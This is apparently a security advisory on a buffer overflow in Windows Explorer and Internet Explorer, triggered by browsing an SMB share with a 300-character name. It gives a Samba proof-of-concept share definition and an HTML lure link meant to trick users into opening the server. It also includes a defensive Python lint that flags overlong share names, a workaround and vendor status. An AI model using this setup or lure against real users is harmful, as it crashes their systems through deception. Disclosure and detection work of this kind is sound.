Microsoft Explorer and Internet Explorer Long Share Name Buffer Overflow

Summary

Microsoft Explorer (explorer.exe) and Microsoft Internet Explorer (IEXPLORE.EXE) are core components of the Microsoft Windows operating systems. An unchecked buffer allows a malicious user to crash Microsoft Explorer by creating a shared directory with an overly long name and convincing a user to access it.

Credit:

The information has been provided by Rodrigo Gutierrez.


Details

Vulnerable Systems:
MS Internet Explorer and MS Explorer (explorer.exe) on the following platforms:
 * Windows XP (all), Windows 2000 (all), Windows 98 (all), Windows ME (all)
 * Windows 2003: not tested

In order to exploit this, an attacker must be able to get a user to connect to a malicious server that exposes a share whose name is 300 characters or longer.

Proof of Concept:
Windows will not allow you to create a share with such a long name, but Samba does. Once your Samba box is up and running, create a share in your smb.conf (the section name written as [A x 300] below stands for 300 consecutive "A" characters):

[A x 300]
comment = Area 51
path = /tmp/testfolder
public = yes
writable = yes
printable = no
browseable = yes
write list = @trymywingchung

Once the server is up, go to your Windows test box and open Start menu > Run > \\your.malicious.server.ip.
Plufff, explorer will crash.

Or by social engineering:
<a href='\\my.malicious.server.ip'>Enter My 0day sploit archive l/p:n0ph33r</a>
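The share definition above is what a defender would want to spot before a client ever browses it. The following lint is an added example, not code from the advisory or from Samba: it parses an smb.conf, skips the [global]/[homes]/[printers] sections, and flags every share whose name is longer than a limit. The 80-character limit is an assumption taken from the share-name length Windows itself enforces; the 300-character figure is the advisory's trigger. The sample smb.conf embedded in the block is constructed for the example.

```python
import re
from typing import Dict, List

# Assumption: Windows caps its own share names at 80 characters, so anything
# longer on a Samba server is already a name no Windows host could have made.
WINDOWS_SHARE_NAME_LIMIT = 80
# Length at which the advisory reports Explorer crashing.
ADVISORY_TRIGGER_LENGTH = 300

# smb.conf sections that configure the server rather than define a share.
SPECIAL_SECTIONS = {"global", "homes", "printers"}

_SECTION_RE = re.compile(r"^\s*\[(.+?)\]\s*(?:[#;].*)?$")
_KV_RE = re.compile(r"^\s*([^=#;]+?)\s*=\s*(.*?)\s*$")


def parse_smb_conf(text: str) -> Dict[str, Dict[str, str]]:
    """Minimal smb.conf parser returning {section name: {key: value}}.

    Handles '#' and ';' comments, blank lines and 'key = value' entries;
    it does not follow 'include =' directives.
    """
    sections: Dict[str, Dict[str, str]] = {}
    current = None
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line[0] in "#;":
            continue
        m = _SECTION_RE.match(line)
        if m:
            current = m.group(1).strip()
            sections.setdefault(current, {})
            continue
        m = _KV_RE.match(line)
        if m and current is not None:
            sections[current][m.group(1).strip().lower()] = m.group(2)
    return sections


def overlong_shares(text: str, limit: int = WINDOWS_SHARE_NAME_LIMIT) -> List[dict]:
    """Return one finding per share whose name is longer than `limit`."""
    findings = []
    for name, params in parse_smb_conf(text).items():
        if name.lower() in SPECIAL_SECTIONS:
            continue
        if len(name) > limit:
            findings.append({
                # Truncate the name so a 300-character share does not flood the report.
                "share": name[:20] + "..." if len(name) > 20 else name,
                "length": len(name),
                # Samba's default for 'browseable' is yes, so an absent key means visible.
                "browseable": params.get("browseable", "yes").lower() in ("yes", "true", "1"),
                "reaches_advisory_trigger": len(name) >= ADVISORY_TRIGGER_LENGTH,
            })
    return findings


# Constructed sample smb.conf (not from the advisory): one ordinary share and
# one whose section name is 300 characters long, as the advisory describes.
SAMPLE_SMB_CONF = f"""
[global]
workgroup = LAB
server string = test box

[public]
path = /srv/public
browseable = yes

[{'A' * 300}]
comment = Area 51
path = /tmp/testfolder
browseable = yes
"""

if __name__ == "__main__":
    for finding in overlong_shares(SAMPLE_SMB_CONF):
        print(finding)
```

Run the script against a real smb.conf by reading the file into `overlong_shares`; a finding with `reaches_advisory_trigger` set is a share that a vulnerable Explorer would crash on merely by browsing the server.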

Workaround:
Until an official fix for this vulnerability is available, disable the "Client for Microsoft Networks" component in your network card's connection settings.

Vendor Status:
Rodrigo Gutierrez notified the vendor at the beginning of 2002. According to the vendor's Knowledge Base article 322857, this vulnerability was to be fixed in Windows XP Service Pack 1 and Windows 2000 Service Pack 4.

Categories: Windows